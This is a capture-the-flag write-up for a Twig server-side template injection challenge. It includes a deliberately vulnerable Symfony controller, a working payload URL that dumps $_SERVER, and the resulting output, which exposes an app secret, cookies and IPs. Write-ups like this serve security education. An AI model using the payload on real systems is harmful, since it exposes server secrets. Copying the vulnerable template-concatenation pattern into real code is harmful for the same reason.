
The Twig Injector (web)

PUBLISHED ON 09/05/2023 — EDITED ON 13/12/2023 — 247CTF, INFOSEC

Hugo treats a double curly brace `{ {` (written with a space here so the page renders) as a shortcode. Remove that space when you try the command.

Intro

Can you abuse the Twig injector service to gain access to the flag hidden in the $_SERVER array?

Source

The regular expression /[^{\.}a-z\|\_]/ in the inject() method removes every character from the “inject” query parameter that is not a lowercase letter (a-z), a dot (.), a curly brace ({ }), a vertical bar (|), or an underscore (_).

<?php

namespace App\Controller;

use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

/**
 * Challenge controller: /inject compiles a character-filtered query parameter
 * as a Twig template; / serves this file's own highlighted source.
 */
class ChallengeController extends AbstractController
{

    /**
     * Renders the "inject" query parameter as Twig template source.
     *
     * The character filter below is the only control on the input: every
     * character outside { . } a-z | _ is dropped (spaces included). What
     * remains is still compiled and executed as Twig code, so any expression
     * built from the allowed characters runs with access to the template
     * globals (the writeup reads app.request.server through it). A filter on
     * characters does not bound what a template can do; the defensive shape
     * is a static template with the user value passed as a context variable,
     * e.g. render(['inject' => $inject]) on a template that only prints
     * {{ inject }}, so the value is data rather than source (whether Twig
     * auto-escapes it then depends on the environment's escaping config).
     *
     * @Route("/inject")
     * @param Request $request incoming request; only the "inject" query parameter is read
     * @return Response text/plain body: greeting line plus the rendered output
     */
    public function inject(Request $request)
    {
        // Strip everything outside the allowlist; without the 'i' flag only
        // lowercase letters survive. If "inject" is absent, get() returns its
        // null default and that is what preg_replace receives as subject
        // (TODO confirm this is intended; recent PHP versions deprecate null here).
        $inject = preg_replace('/[^{\.}a-z\|\_]/', '', $request->query->get('inject'));
        // The filtered input is concatenated into the template SOURCE, not
        // passed as data: this line is the injection point. "${inject}" is the
        // legacy string-interpolation form (deprecated as of PHP 8.2);
        // "{$inject}" is the equivalent current form.
        $response = new Response($this->get('twig')->createTemplate("Welcome to the twig injector!\n${inject}")->render());
        $response->headers->set('Content-Type', 'text/plain');
        return $response;
    }

    /**
     * Serves this controller's own source, syntax-highlighted, as the index
     * page (highlight_file with return=true yields the markup as a string
     * instead of printing it). Source disclosure is deliberate here; it is
     * what lets a reader see the filter that /inject applies.
     *
     * @Route("/")
     * @return Response HTML body holding the highlighted source of this file
     */
    public function index()
    {
        return new Response(highlight_file(__FILE__, true));
    }
}

Solution

https://4cde81270944aaec.247ctf.com/inject?inject={ {%20app.request.server.all|json_encode|raw%20}}

The app.request.server.all|json_encode|raw part of the command is a Twig template expression that uses the json_encode filter to encode the $_SERVER array as JSON, and then uses the raw filter to output the JSON as-is.

When the application receives the request, it evaluates the inject query parameter with the Twig template engine and includes the rendered output — here the $_SERVER array encoded as JSON — in the response.

Note that the regular expression in the inject endpoint’s controller limits the characters that may appear in the inject query parameter; anything else (spaces included) is stripped before rendering. Therefore, the expression you send has to be composed of the allowed characters only.

Welcome to the twig injector!
{"REDIRECT_STATUS":"200","HTTP_HOST":"4cde81270944aaec.247ctf.com","HTTP_X_REAL_IP":"193.105.127.7","HTTP_X_FORWARDED_FOR":"193.105.127.7","HTTP_X_FORWARDED_PROTO":"https","HTTP_CONNECTION":"Upgrade","HTTP_USER_AGENT":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/112.0","HTTP_ACCEPT":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8","HTTP_ACCEPT_LANGUAGE":"en-US,en;q=0.5","HTTP_ACCEPT_ENCODING":"gzip, deflate, br","HTTP_COOKIE":"__stripe_mid=1376bc02-ac8c-4781-b841-a14df422caff19b12a; __stripe_sid=ebca1aca-0d5b-4c03-8ce3-677ae2c3fbc11fa906","HTTP_UPGRADE_INSECURE_REQUESTS":"1","HTTP_SEC_FETCH_DEST":"document","HTTP_SEC_FETCH_MODE":"navigate","HTTP_SEC_FETCH_SITE":"none","HTTP_SEC_FETCH_USER":"?1","PATH":"\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin","SERVER_SIGNATURE":"","SERVER_SOFTWARE":"Apache","SERVER_NAME":"4cde81270944aaec.247ctf.com","SERVER_ADDR":"172.17.0.6","SERVER_PORT":"80","REMOTE_ADDR":"144.76.74.118","DOCUMENT_ROOT":"\/var\/www\/html\/public\/","REQUEST_SCHEME":"http","CONTEXT_PREFIX":"","CONTEXT_DOCUMENT_ROOT":"\/var\/www\/html\/public\/","SERVER_ADMIN":"[no address given]","SCRIPT_FILENAME":"\/var\/www\/html\/public\/index.php","REMOTE_PORT":"54980","REDIRECT_URL":"\/inject","REDIRECT_QUERY_STRING":"inject={ {%20app.request.server.all|json_encode|raw%20}}","GATEWAY_INTERFACE":"CGI\/1.1","SERVER_PROTOCOL":"HTTP\/1.1","REQUEST_METHOD":"GET","QUERY_STRING":"inject={ {%20app.request.server.all|json_encode|raw%20}}","REQUEST_URI":"\/inject?inject={ {%20app.request.server.all|json_encode|raw%20}}","SCRIPT_NAME":"\/index.php","PHP_SELF":"\/index.php","REQUEST_TIME_FLOAT":1683634160.257,"REQUEST_TIME":1683634160,"SYMFONY_ENV":"prod","APP_ENV":"prod","APP_DEBUG":"0","APP_SECRET":"9eb18d9411835ab9db43feaef980738f","APP_FLAG":"247CTF{xxxxxxxxxxxxxxxxxxxxxxxx}","SYMFONY_DOTENV_VARS":"SYMFONY_ENV,APP_ENV,APP_DEBUG,APP_SECRET,APP_FLAG"}